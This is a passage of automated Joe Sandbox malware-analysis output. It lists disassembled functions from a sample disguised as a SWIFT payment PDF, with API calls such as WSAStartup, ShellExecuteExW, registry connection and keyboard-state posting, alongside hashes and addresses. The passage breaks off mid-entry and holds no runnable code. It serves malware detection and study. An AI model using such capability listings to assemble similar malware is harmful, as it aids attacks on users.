                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                        • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                        • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                        • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                        • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                        • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                        • ExitThread.KERNEL32 ref: 0041410F
                                                        • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                        • __freefls@4.LIBCMT ref: 00414135
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                        • String ID:
                                                        • API String ID: 1925773019-0
                                                        • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                        • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                        • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                        • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                        APIs
                                                        • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                        • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                        • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                        • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                        • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                        • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                        • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                        • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                        • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                        • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                        • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                          • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                        • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                        • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                        • _memset.LIBCMT ref: 00464B92
                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                        • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                        • WSACleanup.WSOCK32 ref: 00464CE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                        • String ID:
                                                        • API String ID: 3424476444-0
                                                        • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                        • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                        • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                        • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-0
                                                        • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                        • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                        • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                        • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_wcslen
                                                        • String ID:
                                                        • API String ID: 535477410-0
                                                        • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                        • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                        • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                        • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                        APIs
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                        • _memset.LIBCMT ref: 004538C4
                                                        • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                        • _wcslen.LIBCMT ref: 00453960
                                                        • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 3530711334-4108050209
                                                        • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                        • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                        • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                        • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                        • String ID: HH
                                                        • API String ID: 3488606520-2761332787
                                                        • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                        • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                        • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                        • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                        APIs
                                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                        • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                        • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                        • LineTo.GDI32(?,?), ref: 004474BF
                                                        • CloseFigure.GDI32(?), ref: 004474C6
                                                        • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                        • Rectangle.GDI32(?,?), ref: 004474F3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                        • String ID:
                                                        • API String ID: 4082120231-0
                                                        • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                        • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                        • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                        • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                        APIs
                                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                        • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                        • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                        • LineTo.GDI32(?,?), ref: 004474BF
                                                        • CloseFigure.GDI32(?), ref: 004474C6
                                                        • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                        • Rectangle.GDI32(?,?), ref: 004474F3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                        • String ID:
                                                        • API String ID: 4082120231-0
                                                        • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                        • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                        • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                        • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                        • String ID:
                                                        • API String ID: 288456094-0
                                                        • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                        • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                        • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                        • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                        APIs
                                                        • GetParent.USER32(?), ref: 004449B0
                                                        • GetKeyboardState.USER32(?), ref: 004449C3
                                                        • SetKeyboardState.USER32(?), ref: 00444A0F
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                        • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                        • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                        • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00444BA9
                                                        • GetKeyboardState.USER32(?), ref: 00444BBC
                                                        • SetKeyboardState.USER32(?), ref: 00444C08
                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                        • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                        • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                        • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                        • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                        • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                        • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_wcslen
                                                        • String ID: HH
                                                        • API String ID: 535477410-2761332787
                                                        • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                        • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                        • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                        • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                        APIs
                                                        • _memset.LIBCMT ref: 00457C34
                                                        • _memset.LIBCMT ref: 00457CE8
                                                        • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                        • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
